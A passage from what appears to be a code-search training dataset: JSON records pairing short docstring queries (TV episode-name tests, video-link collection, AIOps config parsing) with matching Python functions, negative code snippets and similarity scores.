"def create_path_query(path, action, start=None):\n supported_actions = ['MATCH', 'CREATE UNIQUE']\n if action.upper() in supported_actions:\n if not start:\n query = 'START r=node:root(root_name = \"ndn\")\\n' +\\\n '%s (r)' % action.upper()\n else:\n query = 'START s=node(%s)\\n' % start + \\\n '%s (s)' % action.upper()\n else:\n raise UnsupportedQueryException(\"unsupported query\")\n\n assert(len(path) % 2 == 0)\n path_len = len(path) / 2\n items = ['-[%s]->(%s)'] * path_len\n query += ''.join(items)\n query = query % tuple(path)\n query += ' \\nRETURN (%s)' % path[-1].split(':')[0]\n\n return query",
"def query(\n self,\n statement, # type: str\n *options, # type: QueryOptions\n **kwargs # type: Any\n ) -> QueryResult:\n\n query = N1QLQuery.create_query_object(statement,\n *options,\n **kwargs)\n return QueryResult(N1QLRequest.generate_n1ql_request(self.connection,\n query.params,\n default_serializer=self.default_serializer))",
"def determine_query():\n return query if query is not None \\\n else f\"SELECT * FROM '{table}';\"",
"def _build_statement(self, document, statement, homepage, user=None, user_id=None):\n\n if re.match(r\"^http(s?):\\/\\/.*\", homepage) is None:\n homepage = f\"http://{homepage}\"\n\n statement = self.build_common_statement_properties(\n statement, homepage, user=user, user_id=user_id\n )\n\n statement[\"context\"].update(\n {\"contextActivities\": {\"category\": [{\"id\": \"https://w3id.org/xapi/lms\"}]}}\n )\n\n statement[\"object\"] = {\n \"definition\": {\n \"type\": \"http://id.tincanapi.com/activitytype/document\",\n \"name\": {self.get_locale(): document.title},\n },\n \"id\": f\"uuid://{document.id}\",\n \"objectType\": \"Activity\",\n }\n\n return statement",
"def build_query_clauses(\n where: str = \"\", order: str = \"\", limit: int = 0, offset: int = 0\n ) -> str:\n return SqliteQueryBuilder.build_query_clauses(where, order, limit, offset)",
"def _build_statement(self, video, statement, homepage, user=None, user_id=None):\n if re.match(r\"^http(s?):\\/\\/.*\", homepage) is None:\n homepage = f\"http://{homepage}\"\n\n statement = self.build_common_statement_properties(\n statement, homepage, user=user, user_id=user_id\n )\n\n category_id = (\n \"https://w3id.org/xapi/lms\"\n if statement[\"verb\"][\"id\"] == \"http://id.tincanapi.com/verb/downloaded\"\n else \"https://w3id.org/xapi/video\"\n )\n\n statement[\"context\"].update(\n {\"contextActivities\": {\"category\": [{\"id\": category_id}]}}\n )\n\n statement[\"object\"] = {\n \"definition\": {\n \"type\": self._get_activity_type(video),\n \"name\": {self.get_locale(): video.title},\n },\n \"id\": f\"uuid://{video.id}\",\n \"objectType\": \"Activity\",\n }\n\n return statement",
"def generate_graph(self):\n\t\tif self.joins == None:\n\t\t\tself.get_joins()\n\t\tprint('generating Networkx DiGraph object of {database} from query results'.format(**self.__dict__))\n\t\t# save distinct Child column values\n\t\tchilds = set([j.Child for j in self.joins])\n\t\t# save distinct Parent column values\n\t\tparents = set([j.Parent for j in self.joins])\n\t\t# save names of Leaf tables\n\t\tleafs = list(childs - parents)\n\t\tself._traverse_joins(leafs)"
] |
[
"0.62883943",
"0.62373525",
"0.6127089",
"0.6076715",
"0.6021788",
"0.5899546",
"0.5822399",
"0.57811886",
"0.5771908",
"0.5636946",
"0.55983907",
"0.5518773",
"0.5502564",
"0.54580635",
"0.53780705",
"0.5359265",
"0.53343433",
"0.5326838",
"0.5302847",
"0.5282023",
"0.52680576",
"0.5252042",
"0.5251066",
"0.5168782",
"0.51577866",
"0.5135911",
"0.51310426",
"0.5127428",
"0.5116321",
"0.5108794"
] |
0.6857161
|
0
|
test the episode name of each of the cases
|
def testGetEpisodeName(self):
for case in self.testCases:
assert case['title'] == getEpisodeName( case['show'], case['season'], case['episode'])
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def test_get_episode_overview(self):\n self.assertEquals(\n self.t['Battlestar Galactica (2003)'][1][6]['overview'].startswith(\n 'When a new copy of Doral, a Cylon who had been previously'),\n True\n )",
"def test_title(names):",
"def test_different_case(self):\n self.assertEquals(self.t['scrubs'][1][4]['episodename'], 'My Old Lady')\n self.assertEquals(self.t['sCruBs']['seriesname'], 'Scrubs')",
"def test_search_checkname(self):\n self.assertEquals(self.t['Scrubs'].search('my first')[0]['episodename'], 'My First Day')\n self.assertEquals(self.t['My Name Is Earl'].search('Faked His Own Death')[0]['episodename'], 'Faked His Own Death')",
"def test_season_iter(self):\n self.assertEquals(\n len(\n [episode for episode in self.t['Life on Mars'][1]]\n ),\n 8\n )",
"def test_episode_data(self):\n self.assertEquals(\n self.t['lost']['firstaired'],\n '2004-09-22'\n )",
"def test_excalibur_name():\n assert I07Nexus.excalibur_detector_2021 == \"excroi\"\n assert I07Nexus.excalibur_04_2022 == \"exr\"",
"def parse_anime_episode_title(filename):\n print_info('Attempting to parse episode title from {0}'.format(filename))\n for regex in ANIME_EPISODE_TITLE_REGEXS:\n m = re.search(regex, filename)\n\n if m is None:\n continue\n\n extracted_title = m.group('EpisodeTitle')\n return clean_episode_title(extracted_title)\n return ''",
"def test_download_specific_episode(self):\n episode = self._get_episode()\n torrent_filename = self.fetcher.download_specific_episode(episode)\n self.assertEqual(torrent_filename, FILENAME_2)",
"def parse_episode(filename):\n print_info('Extracting episode from {0}'.format(filename))\n for regex in EPISODE_NUM_REGEXS:\n m = re.search(regex, filename)\n\n if m is None:\n continue\n\n extracted_ep = m.group('Episode').lower()\n print_info('Extracted episode: {0}'.format(extracted_ep))\n\n if '-' in extracted_ep:\n print_info('Multiple Episodes found')\n tokens = extracted_ep.split('-e')\n first_token = tokens[0]\n last_token = tokens[len(tokens)-1]\n return parse_episode(first_token) + '-' + parse_episode(last_token)\n else:\n ep_num = int(extracted_ep)\n if ep_num is not None and ep_num > 0:\n print_info('Episode might be: {0}'.format(ep_num))\n return 'E' + format_num(ep_num)\n\n return None",
"def executeEpisode(self):\n trainExamples = []\n board = self.game.getInitBoard()\n player = 1\n episodeStep = 0\n\n while True:\n episodeStep += 1\n canonicalBoard = self.game.getCanonicalForm(board, player)\n temp = int(episodeStep < self.args.tempThreshold)\n\n pi = self.mcts.getActionProb(canonicalBoard, temp=temp)\n sym = self.game.getSymmetries(canonicalBoard, pi)\n for b, p in sym:\n trainExamples.append([b, player, p, None])\n\n action = np.random.choice(len(pi), p=pi)\n board, player = self.game.getNextState(board, player, action)\n\n r = self.game.getGameEnded(board, player)\n\n if r != 0:\n ex = [(x[0], x[2], r * ((-1) ** (x[1] != player))) for x in trainExamples]\n return ex",
"def search_season_episode(self,strz):\t\n\t\tpattern = compile(\"(S(\\d\\d)E(\\d\\d))\") #S01E03\n\t\tsep = pattern.search(strz)\t\t\n\t\tif sep is not None:\n\t\t\tse= sep.group(1)\n\t\t\tseason = sep.group(2)\n\t\t\tepisode = sep.group(3)\n\t\t\treturn strz.replace(se,\"\")\n\t\t\t\n\t\tpattern = compile(\"((\\d\\d)x(\\d\\d))\") #01x03\n\t\tsep = pattern.search(strz)\t\t\n\t\tif sep is not None:\n\t\t\tse= sep.group(1)\n\t\t\tseason = sep.group(2)\n\t\t\tepisode = sep.group(3)\n\t\t\treturn strz.replace(se,\"\")\n\t\t\t\n\t\tpattern = compile(\"(Ep(\\d\\d))\") #Ep03\n\t\tsep = pattern.search(strz)\t\t\n\t\tif sep is not None:\n\t\t\tse= sep.group(1)\n\t\t\tepisode = sep.group(2)\n\t\t\treturn strz.replace(se,\"\")",
"def parse_episode_title(filename):\n print_info('Attempting to parse episode title from {0}'.format(filename))\n for regex in EPISODE_TITLE_REGEX:\n m = re.search(regex, filename)\n\n if m is None:\n continue\n\n extracted_title = m.group('EpisodeTitle')\n return clean_episode_title(extracted_title)\n return ''",
"def testOneShow(self):\n\t\t# for line in self.file:\n\t\t# \tprint line\n\t\tline = self.file.readline()\n\t\tinfo = scrapeFilename( line )\n\t\tassert info['show'] == \"Chuck\"",
"def check_for_season_episode_code(s):\n se_pattern = r'[sS](\\d{1,2})[eE](\\d{1,2})'\n\n m = re.search(se_pattern, s)\n\n if not m:\n return False\n\n return m",
"def test_legal_names(self):\n adjectives = ['Awesome', 'Shiny', 'Impressive', 'Portable', 'Improved']\n nouns = ['Anvil', 'Catapult' 'Disguise' 'Mousetrap', '???']\n products = acme_report.generate_products()\n for prod in range(len(products)):\n prod_name = products[prod].name\n name_split = prod_name.split()\n self.assertIn(name_split[0], adjectives)\n self.assertIn(name_split[1], nouns)",
"def matches(self: object, filename: str) -> bool:\n # Filename is equal to episode string representation\n if str(self) == filename:\n return True\n\n # Check leading episode number => download marked as special episode manually\n filename_match: Match[str] = re.search(r\"(^[0-9]{4} )\", filename)\n if filename_match:\n filename_id: int = int(filename_match.group(1))\n return self.episode_id == filename_id\n\n # Check for download of dailymotion\n filename_match: Match[str] = re.search(r\"(_E([0-9]{3,4})_)\", filename)\n if filename_match:\n filename_id: int = int(filename_match.group(2))\n return self.episode_id == filename_id\n\n # Check episode prefix with number => alredy handled by TaRen\n filename_match: Match[str] = re.search(r\"^(Tatort - ([0-9]{4}) )\", filename)\n if filename_match:\n filename_id: int = int(filename_match.group(2))\n return self.episode_id == filename_id\n\n # Last check => Is episode name part of filename\n return self.episode_name.lower() in filename.lower()",
"def test_interaction_accepts_name():\n demag = ThinFilmDemag()\n assert hasattr(demag, 'name')",
"def test_from_name(self, testdata: TestData) -> None:\n for record in testdata['observation_type']:\n assert ObservationType.from_name(record['name']).name == record['name']",
"def test_seasons(self):\n response = Tmdb.season(tmdb_show_id = 69740, season_number = 1)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['episodes'], list))\n # TODO check if all the shows are in the good format (can be from_dict/to_dict)",
"def test_animals_can_speak(self):\n self.assertEqual(self.lion, 'roar')\n self.assertEqual(self.cat, 'meow')",
"def parse_anime_episode(filename):\n print_info('Extracting episode from {0}'.format(filename))\n for regex in ANIME_EPISODE_NUM_REGEXS:\n m = re.search(regex, filename)\n\n if m is None:\n continue\n\n extracted_ep = m.group('Episode')\n print_info('Extracted episode: {0}'.format(extracted_ep))\n\n ep_num = int(extracted_ep)\n if ep_num is not None and ep_num > 0:\n print_info('Episode might be: {0}'.format(ep_num))\n return 'E' + format_num(ep_num)\n\n return None",
"def test__parse_activity_name():\n for input_data, expected_output in (\n ({}, None),\n ({'game': None}, None),\n ({'game': {}}, None),\n ({'game': {'name': None}}, None),\n ({'game': {'name': ''}}, None),\n ({'game': {'name': 'a'}}, 'a'),\n ):\n output = parse_activity_name(input_data)\n vampytest.assert_eq(output, expected_output)",
"def testName(self):\n dis_meta = DiseaseMeta()\n\n self.util.stringTypeTest(self, dis_meta, \"name\")\n\n self.util.stringPropertyTest(self, dis_meta, \"name\")",
"def test_selecting_only_audio_episodes(\n only_audio_episodes: List[LepEpisode],\n) -> None:\n assert len(only_audio_episodes) == 14 # Without duplicates",
"def test_name_returner(self):\n test = self.data.name_returner()\n self.assertIn(('Trevor', 'Harvey'), test)\n self.assertIn(('Nik', 'Silver'), test)",
"def check_season_bounds(next_episode, show_details):\n pass",
"def _episode_matches(self, study_id: str, session_id: str, episode_id: str):\n return ((self._episodes.c.StudyId == study_id)\n & (self._episodes.c.SessionId == session_id)\n & (self._episodes.c.EpisodeId == episode_id))",
"def test_one_disemvowel_code_wars():\n from disemvowel_trolls import disemvowel\n tests = [(\"This website is for losers LOL!\", \"Ths wbst s fr lsrs LL!\"),\n (\"No offense but,\\nYour writing is among the worst I've everread\",\n \"N ffns bt,\\nYr wrtng s mng th wrst 'v vrrd\"),\n (\"What are you, a communist?\", \"Wht r y, cmmnst?\")]\n\n for case in tests:\n assert disemvowel(case[0]) == case[1]",
"def test_repr_episode(self):\n self.assertEquals(\n repr(self.t['CNNNN'][1][1]),\n \"<Episode 01x01 - September 19, 2002 (20:30 - 21:00)>\"\n )"
] |
[
"0.64243835",
"0.6258172",
"0.6202211",
"0.59608656",
"0.59162605",
"0.5914089",
"0.580214",
"0.5769495",
"0.57401305",
"0.5728818",
"0.56901574",
"0.5687813",
"0.56416893",
"0.5636315",
"0.5620725",
"0.5576326",
"0.5573055",
"0.55627346",
"0.5557772",
"0.5534065",
"0.5523661",
"0.5500905",
"0.5497799",
"0.5489746",
"0.5480026",
"0.5476657",
"0.54428416",
"0.5417085",
"0.5398167",
"0.53924"
] |
0.8190277
|
0
|
Collect links for videos related to self.keyword
|
def video_link_collector(self, count):
pass
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def get_individual_video_link(self):\r\n self.filter_url_portion = '' # ignore the filter option.\r\n\r\n target_search_results_obj = []\r\n # in case we want to search more pages just change this and make a loop\r\n self.page_url_portion = '&page=1'\r\n\r\n # start with forming the search\r\n self.form_search_url()\r\n\r\n # Get the dom object from the search page\r\n search_result_dom = self.get_dom_object(self.target_yt_search_url_str)\r\n\r\n # Get the search results\r\n target_search_results_obj.extend(self.tag_element_results(search_result_dom,\r\n 'div[class=\"yt-lockup-content\"] h3[class=\"yt-lockup-title\"] a'))\r\n\r\n #print 'results len: ', len(target_search_results_obj)\r\n\r\n each_video_link_title_dict = {}\r\n for n in target_search_results_obj:\r\n video_link = n.attributes['href']\r\n ## modified video link\r\n # video_link = re.sub('watch\\?v=',r'v/',video_link)\r\n\r\n video_title = n.attributes['title'] #\"Mix\" in video_title[:4] or \"mix\" i(n video_title[:4] or\r\n ile = video_title.lower()\r\n if \"cover\" in ile or \"live\" in ile or \"acustic\" in ile or \"acoustic\" in ile or \"lesson\" in ile:\r\n print \"found blacklisted term, bypassing song: \" + ile\r\n pass #dont want these\r\n else:\r\n each_video_link_title_dict[video_title] = 'https://www.youtube.com' + video_link\r\n\r\n self.video_link_title_dict.update(each_video_link_title_dict)",
"def search_videos(self, search_term):\n print(\"search_videos needs implementation\")",
"def get_keywords_for_movie(url):\n pass",
"def search_videos_tag(self, video_tag):\n print(\"search_videos_tag needs implementation\")",
"def get_links_filter(self, keyword, number_links):\r\n podcast_data = []\r\n\r\n for entry in self.rss[0].entries:\r\n if keyword in entry.title: \r\n try:\r\n podcast_data = [entry.published, entry.title, \r\n entry.enclosures[0]['href'], \r\n self.rss[0].feed.title\r\n ]\r\n except IOError as err:\r\n print err\r\n except UnicodeDecodeError as err:\r\n print err\r\n else:\r\n self.podcast_list.append(podcast_data)\r\n if number_links != 0:\r\n if len(self.podcast_list) == number_links: \r\n return None\r\n return None",
"def subtitle_search_engines_links(search, deep=0, debug=0, links=[]):\n s = Subseek()\n for subtitle_search_engine in SUBTITLE_SEARCH_ENGINES:\n if debug == 1:\n print \"Searching '%s' in '%s'\" % (search,\n subtitle_search_engine['name'])\n links_aux = s.get_links(subtitle_search_engine, search, deep)\n if not links_aux or len(links_aux) == 0:\n if debug == 1:\n print \"No match found in '%s'\" % subtitle_search_engine['name']\n else:\n if debug == 1:\n print \"%s matches found in '%s'\" % (len(links_aux),\n subtitle_search_engine['name'])\n\n links = links_aux + links\n\n return links",
"def search_videos(self, search_term):\n videos = self._video_library.get_all_videos()\n\n temp_list = []\n for vid in videos:\n\n # Convoluted way to display tags in required format\n tags = \"[\"\n for tag in vid.tags:\n tags = tags + tag + \" \"\n tags = tags + \"]\"\n print(f\"{vid.title}\")\n if tags != \"[]\":\n tags = tags[0:len(tags) - 2] + \"]\"\n if str(search_term.lower()) in str(vid.title):\n temp_list += [f\"{vid.title} ({vid.video_id}) {tags}\"]\n\n # Sort the list and display\n sorted_list = sorted(temp_list)\n print(f\"Here are the results for {search_term}:\")\n for x in sorted_list:\n print(\" \" + f\"{sorted_list.index(x) + 1}) \" + x)",
"def search_videos(self, search_term):\n results = []\n for video in self._video_library.get_all_videos():\n if search_term.lower() in video.title.lower() and video.flag is None:\n results.append(video)\n self.output_search_results(results, search_term)",
"def search_videos(self, search_term):\n videos = self._video_library.get_all_videos()\n videos.sort(key=lambda x: x.title, reverse=False)\n matched_id = []\n for v in videos:\n if search_term.lower() in v.title.lower():\n matched_id.append(v.video_id)\n \n if matched_id:\n i = 1\n print(f\"Here are the results for {search_term}:\")\n for id in matched_id:\n video = self._video_library.get_video(id)\n tags = str(video.tags)\n tags=tags.replace(\"'\",\"\")\n tags=tags.replace(\",\", \"\") \n tags=tags.replace(\")\", \"\") \n tags=tags.replace(\"(\", \"\") \n print(f\" {i}) {video.title} ({video.video_id}) [{tags}]\")\n\n i = i+1\n \n print(\"Would you like to play any of the above? If yes, \"\n \"specify the number of the video.\")\n print(\"If your answer is not a valid number, we will assume it's a no.\")\n option = input()\n # option = input(\"Would you like to play any of the above? If yes, \"\n # \"specify the number of the video. \\n If your answer is not a valid number, we will assume it's a no.\")\n\n try:\n value = int(option)\n if value > 1 and value < len(matched_id)+1 :\n self.play_video(matched_id[value-1])\n except ValueError:\n pass\n\n else:\n print(f\"No search results for {search_term}\")\n \n \n # print(\"search_videos needs implementation\")",
"def dirty_yt_search(keyword):\n yt_url = 'https://www.youtube.com/results'\n search_args = {'search_query': keyword}\n\n resp = requests.get(yt_url, search_args)\n print(resp.text)\n search_results = re.findall(r'href=\\\"\\/watch\\?v=(.{11})', resp.text)\n return 'http://www.youtube.com/watch?v=' + search_results[0]",
"def download_video_data(self):\n\n def scrape_url(url):\n \"\"\"Scrape the video list, youtube_dl does all the heavy lifting\"\"\"\n ydl_opts = {\n \"ignoreerrors\": True, # Skip private and unavaliable videos\n }\n\n ydl = youtube_dl.YoutubeDL(ydl_opts)\n\n with ydl:\n result_ydl = ydl.extract_info(\n url,\n download=False # No download needed, only the info\n )\n\n logger.debug('Url scraped {}', url)\n if 'entries' in result_ydl:\n # It's a playlist or a list of videos\n return result_ydl['entries']\n # Just a video\n return [result_ydl]\n\n youtube_list = sum((scrape_url(url) for url in self.youtube_lists), [])\n for youtube_video_data in youtube_list:\n if youtube_video_data: # Valid video\n self.youtube_videos.append(\n Video.from_youtube(\n video_data=youtube_video_data, event=self))\n else:\n logger.warning('Null youtube video')",
"def get_links(self: 'WebScraper', \n keyword: str\n ) -> Generator[req.Response, None, None]:\n print(f\"Collecting articles for the keyword '{keyword}'...\")\n \n # Create strainer that only searched for links with the corresponding \n # class specified in the constant LINKS_CLASS\n only_links = SoupStrainer(\n 'a', {'class': LINKS_CLASS}\n )\n parameters = {'q': keyword}\n \n # Iterate through the pages of the search\n for i in count(1):\n\n # Stop when the page limit has been reached\n if i > PAGE_LIMIT:\n return None\n \n # for keyword in keyword_synonyms:\n parameters['page'] = i\n res = self.get_request(SEARCH_URL, parameters)\n links = {\n link['href'] \n for link in BeautifulSoup(\n res.text, 'lxml', \n parse_only=only_links\n ).find_all('a', href=True) \n if self.verify(link['href'])\n }\n \n for link in links:\n this = self.get_request(link)\n if keyword.lower() in this.text.lower():\n yield this",
"def get_videos_urls(author):\n\tfoundAll = False\n\tind = 1\n\tvideos = []\n\twhile not foundAll:\n\t inp = urllib.urlopen(r'http://gdata.youtube.com/feeds/api/videos?start-index={0}&max-results=50&alt=json&orderby=published&author={1}'.format( ind, author ) )\n\t try:\n\t resp = json.load(inp)\n\t inp.close()\n\t returnedVideos = resp['feed']['entry']\n\t for video in returnedVideos:\n\t videos.append( video['link'][0]['href'] ) \n\n\t ind += 50\n\t if ( len( returnedVideos ) < 50 ):\n\t foundAll = True\n\t except:\n\t #catch the case where the number of videos in the channel is a multiple of 50\n\t print \"error\"\n\t foundAll = True\n\n\treturn videos",
"def external_search_engines_links(search, deep=0, debug=0, links=[]):\n s = Subseek()\n for search_engine in SEARCH_ENGINES:\n for subtitle_search_engine in SUBTITLE_SEARCH_ENGINES:\n if debug == 1:\n print \"Searching '%s' in '%s'\" % (search,\n search_engine['name'])\n links_aux = s.get_links(search_engine, search, deep,\n subtitle_search_engine[\"name\"])\n if not links_aux or len(links_aux) == 0:\n if debug == 1:\n print \"No match found in '%s'\" % search_engine['name']\n else:\n if debug == 1:\n print \"%s matches found in '%s'\" % (len(links_aux),\n search_engine['name'])\n links = links_aux + links\n\n return links",
"def get_videos_in_playlist(self):\n\n self.ydl = youtube_dl.YoutubeDL()\n # uses the youtube_dl as a context manager\n with self.ydl:\n self.result = self.ydl.extract_info(\n self.url, extra_info={'listformats': True}, download=False)\n for video in (self. result['entries']):\n video_id = video['id']\n self. url = f'https://www.youtube.com/watch?v={video_id}'\n self. show_formats()",
"def get_video_links(html):\n soup = BeautifulSoup(html, 'lxml')\n\n video_links = []\n video_titles = []\n playlist_items = soup.find_all('ytd-playlist-video-renderer')\n for playlist_item in playlist_items:\n\n # Get video link\n href = playlist_item.find('a')['href']\n video_link = 'https://www.youtube.com' + href.split('&')[0]\n video_links.append(video_link)\n\n # Get video title\n video_title = playlist_item.find('span',id='video-title')['title']\n video_titles.append(video_title)\n\n # Print list\n print('\\nLinks:')\n res = '\\n'.join(\"{} \\t {}\".format(x, y) for x, y in zip(video_titles, video_links))\n print(res)\n\n return video_links, video_titles",
"def download_all_videos(self, dl_limit=10):\r\n counter = dl_limit\r\n self.video_link_title_keylist = self.video_link_title_dict.keys()\r\n music = []\r\n for title in self.video_link_title_keylist:\r\n try:\r\n title = title.encode('ascii')\r\n # print 'downloading title with counter: ', counter\r\n if not counter:\r\n return random.choice(music) #some margin for randomness, first result isnt always accurate, (gets slower...)\r\n print 'downloading title: ', title\r\n\r\n self.add_result(\"Dowloaded_Song\", title)\r\n\r\n path = self.download_video(self.video_link_title_dict[title], title)\r\n music.append(path)\r\n counter = counter - 1\r\n except:\r\n print \"illegal characters in youtube name\" + title + \"\\n trying next result\"",
"def collect_webpages(self, keyword: str) -> Dict[str, List[req.Response]]:\n collected = {\n keyword: list(islice(\n takewhile(lambda x: x is not None, self.get_links(keyword)), \n 100\n ))\n }\n print(f\"Found {len(collected[keyword])} articles for the keyword \"\n f\"'{keyword}'.\")\n return collected",
"async def igvideo(self, ctx, url):\n response = requests.get(url.replace(\"`\", \"\"), headers={\"Accept-Encoding\": \"utf-8\"})\n tree = html.fromstring(response.content)\n results = tree.xpath('//meta[@content]')\n sources = []\n for result in results:\n try:\n if result.attrib['property'] == \"og:video\":\n sources.append(result.attrib['content'])\n except KeyError:\n pass\n if sources:\n await ctx.send(sources[0])\n self.logger.info(misolog.format_log(ctx, f\"Success\"))\n else:\n await ctx.send(\"Found nothing, sorry!\")\n self.logger.warning(misolog.format_log(ctx, f\"Found nothing\"))",
"async def video(ctx, message):\n \"\"\":param: ctx\"\"\"\n \"\"\":param: message\"\"\"\n \"\"\"return video url\"\"\"\n link_list = []\n print ('Searching YouTube for: %s' % message)\n url = \"https://www.youtube.com/results?search_query=\" + message\n response = urlopen(url)\n html = response.read()\n soup = BeautifulSoup(html, \"lxml\")\n for vid in soup.findAll(attrs={'class': 'yt-uix-tile-link'}):\n link_list.append('https://www.youtube.com' + vid['href'])\n if(len(link_list) >=1):\n random_num = random.randint(0, len(link_list) - 1)\n await bot.say(link_list[random_num])\n else:\n await bot.say(\"there is no contente for \"+message)",
"def _get_video_from_html(self, results_page, verbose=False):\n d = json.loads(results_page.text)\n for record in d['data']['records']:\n video_url = record['videoUrl']\n if verbose:\n print \"Video url: \" + video_url\n self._download_from_url(video_url)",
"def get_videos(url):\n videos = []\n if 'cinebix.com' in url:\n resolve_media(url,videos)\n return videos\n \n html = requests.get(url, headers=mozhdr).text\n mlink = SoupStrainer('div', {'class':re.compile('^singcont')})\n videoclass = BeautifulSoup(html, parseOnlyThese=mlink)\n try:\n links = videoclass.findAll('iframe')\n for link in links:\n url = link.get('src')\n resolve_media(url,videos)\n except:\n pass\n\n mlink = SoupStrainer('div', {'class':'entry-excerpt'})\n videoclass = BeautifulSoup(html, parseOnlyThese=mlink)\n try:\n links = videoclass.findAll('iframe')\n for link in links:\n if 'http' in str(link):\n url = link.get('src')\n resolve_media(url,videos)\n except:\n pass\n\n try:\n url = videoclass.p.a.get('href')\n resolve_media(url,videos)\n except:\n pass \n \n return videos",
"def search_videos(self, search_term):\n all_videos = self._video_library.get_all_videos()\n all_videos.sort(key=lambda x: x.title)\n matching_videos = []\n for video in all_videos:\n if search_term.lower() in video.title.lower():\n matching_videos.append(video)\n\n matching_videos.sort(key=lambda x: x.title)\n\n if len(matching_videos) == 0:\n print(f\"No search results for {search_term}\")\n return\n\n print(\"Here are the results for cat:\")\n for i, matching_video in enumerate(matching_videos):\n print(f\"{i + 1}) {str(matching_video)}\")\n\n print(\n \"Would you like to play any of the above? If yes, specify the number of the video.\\nIf your answer is not a valid number, we will assume it's a no.\")\n video_number = input()\n\n # print(video_number)\n\n try:\n int_video_number = int(video_number)\n if int_video_number > len(matching_videos) or int_video_number < 0:\n return\n else:\n self.play_video(matching_videos[int_video_number - 1].video_id)\n except ValueError:\n return",
"def get_videos(self, **kwargs):\n return self.get('videos', **kwargs)",
"def videos(self):\n return self._videos",
"def search_videos(self, search_term):\n recommendations = []\n for video in self.videos_dict:\n if not video.flagged and search_term in self.videos_dict[video]:\n recommendations.append(self.videos_dict[video])\n \n recommendations.sort()\n n = len(recommendations)\n\n\n if n == 0:\n print(f\"No search results for {search_term}\")\n else:\n print(f\"Here are the results for {search_term}:\")\n for i in range(n):\n print(f\"{i+1}) {recommendations[i]}\")\n print(\"Would you like to play any of the above? If yes, specify the number of the video.\")\n print(\"If your answer is not a valid number, we will assume it's a no.\")\n\n try:\n response = int(input())\n if response in range(1,n+1):\n wanted_video_info = recommendations[response-1]\n #print(wanted_video_info)\n s = wanted_video_info\n result = re.search(r\"\\(([A-Za-z0-9_]+)\\)\", s)\n #print(result.group(1))\n self.play_video(result.group(1))\n except ValueError:\n pass",
"async def video(self, ctx, *, arg: str):\n await ctx.send(site + self.extraire(search + self.traduire(arg.split(' ')), watch_))",
"def fetch_metadata_for_videos(category_url):\n soup = Soup(requests.get(category_url).content)\n for div in soup('div', attrs={'class': 'row-fluid section'}):\n title = div.findAll('a')[1].text\n description = div.findNext('div', attrs={'class':\n 'span7'}).findNext('p').text\n video_path = div.findNext('a')['href']\n video_url = 'http://pyvideo.org%s' % video_path\n yield title, description, video_url",
"def videos(self, videos):\n self._videos = videos",
"def get_links(file_src='index.html') -> List[Dict[str, str]]:\n with open(file_src) as file:\n soup = BS(file.read(), 'html.parser')\n\n vid_entries = soup.select('a.yt-simple-endpoint.style-scope.ytd-playlist-video-renderer')\n for vid_elem in vid_entries:\n song = vid_elem.select_one('span[title]')\n if song:\n title = song['title']\n href = vid_elem.select_one('a[href]')['href']\n yield {'title': title, 'href': href}"
] |
[
"0.7419088",
"0.6758847",
"0.6309692",
"0.6072542",
"0.6046429",
"0.6040589",
"0.60183644",
"0.60161775",
"0.5893839",
"0.58668417",
"0.58567715",
"0.58200836",
"0.5790145",
"0.57832175",
"0.5780403",
"0.5768532",
"0.5761548",
"0.57241505",
"0.5710994",
"0.570829",
"0.5701255",
"0.5697841",
"0.5676796",
"0.5673732",
"0.56617445",
"0.56183356",
"0.559826",
"0.55637723",
"0.5559803",
"0.55412877"
] |
0.6862361
|
1
|
Abstract method implementation to parse AIOps specific properties stored in the key vault config.
|
def parseProperties(self) -> bool:
# vNetIds is not a mandatory property. This property can be used if the resources are distributed across multiple vNets.
self.vNetIds = self.providerProperties.get("vNetIds", None)
# enabledProviders contains the provider types for which AIOps is enabled. Mandatory property.
self.enabledProviders = self.providerProperties.get(
"enabledProviders", None)
if not self.enabledProviders:
self.tracer.error(
"[%s] enabledProviders cannot be empty in the AIOps config." % self.fullName)
return False
return True
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def parse_config(self):\n # TODO: parse config file\n pass",
"def _parse_config(self, profile: Optional[str]):\n\n # read the values\n def assign_key(key: str):\n if self._config_parser.has_option(section, key):\n if key.lower() == _USE_COLOR.lower():\n self.__dict__[key] = self._config_parser.getboolean(section, key)\n else:\n self.__dict__[key] = self._config_parser.get(section, key)\n\n # get the profile\n section = _DEFAULT\n if profile is None:\n if self._config_parser.has_option(_DEFAULT, _PROFILE):\n section = self._config_parser.get(_DEFAULT, _PROFILE)\n self.profile = section\n else:\n section = profile\n\n assign_key(_ACCESSKEY)\n assign_key(_WORKSPACEID)\n assign_key(_TENANTID)\n assign_key(_URL)\n assign_key(_GATEWAYURL)\n assign_key(_USE_COLOR)\n\n # if url is none set it to default bonsai api url\n if self.url is None:\n self.url = _DEFAULT_URL\n elif not urlparse(self.url).scheme:\n # if no url scheme is supplied, assume https\n self.url = \"https://{}\".format(self.url)",
"def parse_conf(self):\n\n parser = configparser.RawConfigParser()\n parser.read(self.filename)\n\n try:\n self.id_node = parser['CONF_MACHINE']['ID_NODE']\n\n # eliminate possible white spaces between metrics\n temp = parser['CONF_MACHINE']['METRICS'].split(',')\n for itr in temp:\n self.metrics.append(itr.strip())\n\n except Exception:\n raise Exception(\"missing id or metrics\")\n\n try:\n self.interval = parser['CONF_MAHCINE']['INTERVAL']\n except Exception:\n self.interval = 1\n\n try:\n self.ampq_url = parser['ampq']['url']\n self.ampq_port = parser['ampq']['port']\n self.ampq_vhost = parser['ampq']['vhost']\n self.ampq_user = parser['ampq']['user']\n self.ampq_password = parser['ampq']['password']\n except Exception:\n raise Exception(\"missing ampq configs\")",
